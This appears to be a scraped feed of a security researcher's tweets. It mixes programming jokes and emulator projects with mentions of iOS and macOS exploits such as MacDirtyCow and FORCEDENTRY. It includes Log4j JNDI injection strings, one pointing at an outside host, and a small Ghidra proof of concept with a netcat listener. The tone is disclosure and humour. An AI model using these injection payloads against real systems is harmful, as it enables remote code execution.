link in bio
⬛⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩
⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩🟩🟩
⬛⬛🟧⬛🟩🟫🟫🟫🟫🟫🟫🟩
⬛⬛🟧⬛🟫🟫🟫🟫🟫🟫🟫🟫
⬛⬛🟧🟧🟫🟧🟩🟧🟧🟩🟧🟫🟧
⬛⬛🟧🟧🟫🟧🟫🟧🟧🟫🟧🟫🟧
⬛⬛⬛🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧
⬛⬛⬛🟩🟩🟧🟧🟫🟫🟧🟧🟩🟩
⬛🟫🟫🟫🟫🟫🟧🟧🟧🟧🟩🟩🟫
🟫🟫🟧🟫🟫🟫🟫🟩🟩🟩🟩🟩🟧
🟫🟧🟧🟧🟫🟫🟧🟫🟫🟩🟩🟧🟧
DS emulation in Augmented Reality:
Displays game as a holographic 3D model.
- DS emulated with melonDS (iOS port from rileytestut's Delta)
- 3D model extracted with scurest's amazing MelonRipper tool
- rendered with iOS
#RealityKit
#AugmentedReality
#AR
I wasn't expecting Minecraft players to discover ANY world-shattering security exploits.
They found TWO just this week:
- Log4j
- NSO iMessage attack using a PDF to emulate 70,000 virtual Redstone torches to build a 64-bit Redstone computer
We truly live in unprecedented times
Heartwarming: Google engineer waited 20 years for her husband when everyone thought him lost at sea
-She told suitors she won't remarry until Google has a coherent messaging strategy
-Every day, she makes a new chat app
-But every night, she cancels it before it rivals iMessage
Made an app that overwrites the iOS system font using CVE-2022-46689.
It works on iOS 16.1.2 and below on unjailbroken devices.
Four fonts are included: DejaVu Sans Condensed, Serif, Mono, and Choco Cooky (because Samsung).
iOS exploits:
builds a 64-bit virtual machine from 70,000 AND/OR/XOR/XAND logic gates inside a corrupted PDF just to run jailbreak code
Java exploits:
${jndi:ldaps://notnow.dev:3389/lol}
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists,
activists and dissidents around the world.
Ghidra's vulnerable to log4j:
__attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}")))
int a = 1;
int main(){}
$ gcc hello.c
$ nc -l 1234
Load into Ghidra; it connects to 127.0.0.1:1234.
Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1
Lost a billion dollars buying a big batch of benzene because I heard the price was about to increase.
My stockpile all evaporated before I could sell it.
Lesson learned: the market can remain irrational longer than your solvent can remain.
Let's be honest: whoever built that iMessage zero-click for NSO is a redstoner.
No-one else looks at a bug that gives AND/OR/XOR/XNOR primitives, and goes,
"let's build a 64-bit computer out of logic gates"!!
New blog post: hardware accelerated virtual machines on a jailbroken iPhone 12 / iOS 14.1
... it's not practical (VMs are limited to 900MB of RAM), but shows iPhone's untapped potential.
Here's Fedora 36 in a modified
@UTMapp
with hardware virtualization:
Stop throwing exceptions
Stacks are not meant to be unwound
Years of C++ yet no real life codebase found with exceptions enabled
Wanna check for errors anyways for a laugh? We had a variable for that: it's called errno
They have played us for absolute fools
Heads up! A lot of the software you’re using might be silently invading your privacy without you even knowing 😱
Don’t fear, though: one thing you can do to help is switching to Linux so your Wi-Fi stops working, blocking all malware🙈
Made an app that removes the three app limit for free provisioning.
Hit "Go" just before installing apps.
Should work on iOS 16.1.2 and below / iOS 15.7.1 and below.
Thanks to XsF1re for figuring out the methods to patch:
Since debilitating sandbox, It would be interesting if we can patch /usr/libexec/installd using MacDirtyCow exploit!
haha
#MacDirtyCow
- Allow installing over-the-air signed apps by free developer certificate.
- Removes the 3 app limit for free developer accounts.
A climate-controlled vault at the United States National Institute of Standards and Technology (NIST) holds the reference critical security bug for calibrating the CVE severity 10.0 score
The iOS SDK was released in 2008 - 13 years ago.
Swift was released in 2014 - 7 years ago.
Swift has been around for more than half of iOS development.
New blog post: I ran the iOS kernel in QEMU emulation to boot into userspace and start launchd. I also wrote a tutorial so you can examine iOS's boot process with virtualization.
New blog post:
Get root on macOS 12.3.1: proof-of-concepts for
@LinusHenze
's CoreTrust and DriverKit bugs
My proof-of-concepts for:
CVE-2022-26766: CoreTrust allows any root certificate
CVE-2022-26763: IOPCIDevice::_MemoryAccess not checking bounds at all
Stop designing binary formats!
Objects are not meant to be serialized
30-year old mature code in billions of browsers, yet no codec survives 10 minutes of fuzzing
Want to read untrusted data anyways for a laugh? We have a tool for that: it's called "ASN.1"
Protobuf? Moov? NBT??
To think, if you were better at BSing investors, we could've had headlines like
"Kickstarter announces pivot to IPv6"
"Twitter CEO going all-in on IPv6"
"Ubisoft incorporates IPv6 into DLC"
"Iced tea maker rebrands to 'Long Island IPv6 Corp'"
New blog post:
You don’t need expensive equipment for VoLTE/VoWiFi research!
Learn how VoLTE/VoWiFi works by setting up your own Wi-Fi calling server with free software.
"A security issue was discovered in Kubernetes where loading specially-crafted yaml can lead to code execution."
()
That's funny: I've been loading YAML into Kubernetes for a whole day now and it still haven't executed any code
Ian Beer released his proof-of-concept for CVE-2022-46689 (MacDirtyCow):
His exploit accomplishes two things I didn't know was possible:
- writing the last byte in a 16k page
- take over system daemons
fuck "nixOS". everything i install gets tar xf'd into /bin. raw binaries without the functional shit. no, i will NOT reproduce your build. curl pipe bash. i live for this
Apple updated the iPhone 5S for longer than Microsoft updated their entire mobile platform.
iPhone 5S:
- released Sept 2013
- last update: July 2019 = 6 years
Windows:
- Windows Phone 8 released Oct 2012
- Windows Mobile 10 last update: Oct 2017 = 5 years
iPhone 14 Pro can barely emulate a Nintendo Switch.
It's enough to run a 2D Unity game with some crashes.
The game is , D3fau4's port of .
The emulator is Ryujinx (), wrapped to run on iOS.
Game starts at 00:47.
strongest java library in the world, howeve,r it is so fragile as to execute arbitrary code when handled by any force other than the delicate touch of a lesbian .
STOP RUNNING CONSTRUCTORS AT STARTUP
GLOBAL VARIABLES ARE SUPPOSED TO BE INITIALIZED WITH CONSTANTS
40 years of C++ yet NO defined order for calling global constructors
Want to initialize your variables with code for a laugh? We have a function for that: it's called `main`
Stop optimizing code!
Behaviours are supposed to be defined
50 years of C development yet no real-world use found for strict aliasing
Want to funroll loops anyway for a laugh? We have a tool for that: it's called "Duff's device"
They have taken us for absolute fSegmentation fault
Intel is now extremely cautious when picking names for open source projects, a policy instituted after someone at Intel managed to name their project "PowerTOP"
Please fix this, Twitter. I didn't pay $132,000 to become the cryptographically proven owner of the 1.87GB GIF of the entire Bee Movie just to get a static image in my avatar
The view-source controversy shows that the Open Web must become decentralized to survive.
Thus, I'm proud to announce ViewSourceCoin, my new NFT ICO where
Later today, I will be disclosing a vulnerability that affects C, C++, Rust, Go, Swift, and other languages:
Bad Programmers can use these languages to write terrible code.
Proof-of-concept:
The "billion-dollar-nft-torrent.torrent" from the NFT Bay only has 10GB of data: the rest is a 17TB blank file.
(Proof: , )
Which makes it worth exactly as much as all the NFTs in the world - Zero.
"C is 'portable assembly': we should redefine 'undefined behaviour' to match the hardware, so out-of-bounds access immediately traps", says local Twitter user with a brand-new $1599.99 phone with ARM Memory Tagging Extension
Reminder: the ARM processor in the original iPhone/3G, the 3DS, and the Raspberry Pi Zero can execute Java bytecode natively
Ti-NSpire calculator homebrew developers have reverse engineered ARM's Jazelle technology and provided sample code you can run:
Me: tell me the stack layout of varargs you Bell Labs piece of shit
C: can you feel your address space burning? my ABI is beyond anything your FFI can make. you cannot kill me in a way that matters
Me loading libclang, tears streaming down my face: I'm nOT FUCKING SCARED OF YOU